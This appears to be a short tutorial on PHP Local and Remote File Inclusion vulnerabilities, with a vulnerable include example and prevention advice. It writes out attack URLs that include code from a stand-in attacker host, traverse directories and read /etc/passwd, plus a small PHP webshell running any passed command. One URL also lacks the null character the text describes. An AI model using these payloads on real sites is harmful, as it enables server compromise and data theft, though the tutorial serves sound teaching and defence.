File Inclusion Vulnerabilities

File inclusion vulnerabilities are often found on websites that include files from local or remote locations. File inclusion vulnerabilities are of two types viz. Local File Inclusion and Remote File Inclusion. As the name suggests, an attacker can load any local file present on the server into the displayed page through LFI. Files present elsewhere on the internet can be included on the page through RFI. This is again a Web Application vulnerability and caused due to improper or no validation of the user input. RFI is dominantly found on PHP pages.
Possible threats arising out of File Inclusion vulnerabilities are - code execution on server as well as client side, can lead to other types of attacks such as Cross Site Scripting and Denial of Service, and also manipulation or deletion of critical data.
File Inclusion vulnerabilities are pretty straightforward and easy to understand.

User input is accept into a PHP page through $_GET, $_POST and $_COOKIE. The problem arises when these inputs are passed to functions like 'include' and 'require' without validation. Attackers can alter the variables being passed to these functions to include crafted remote pages having malicious code. This malicious code will then get executed on the victim server and hence, compromising its security. 
Consider this example code taken from wikipedia,

<?php 

$color = 'blue'; 

if (isset( $_GET['COLOR'] ) ) 

       $color = $_GET['COLOR'];

include( $color . '.php' ) ; 

?>

The user accepted parameter 'COLOR' is passed to the include function through $color variable. an attacker can replace the name of color by something like this.

http://hacker.example.com/evilcode.txt?

Therefore the resulting URL will look like this.

http://localhost/rfivuln.php?color=http://hacker.example.com/evilcode.txt?

This will inject a remote file evilcode.txt which can have malicious code or it can be a webshell.
Local files that are already present on the webserver can also be included.

http://localhost/rfivuln.php?color=C:\\www\\uploads\\webshell.txt

Here, is a null character indicating the end of the URL which helps to get rid of appending '.php' extension. webshell.txt is a file attacker uploaded on the web server which can execute commands passed to it as argument. contents of the webshell.txt may be...

<?php    

 $cmd = $_GET['cmd'];      

exec($cmd); 

?>

 LFI can be used to perform directory traversal which can give access to some critical files.

http://localhost/lfivuln.php?color=/../../../something/critical

Or to extract username and passwords from local machine.

http://localhost/lfivuln.php?color=/etc/passwd

For the prevention of file inclusion vulnerabilities, the user input must be sanitized to escape dangerous characters such as '?', '/', ':' or keywords like 'http://'. Additionally, a white list of permitted pages to be included can be maintained. When the user enters the page they wish to include, this input is compared with all the entries present in the list and loaded only if a match is found. 

I hope you found this informative :)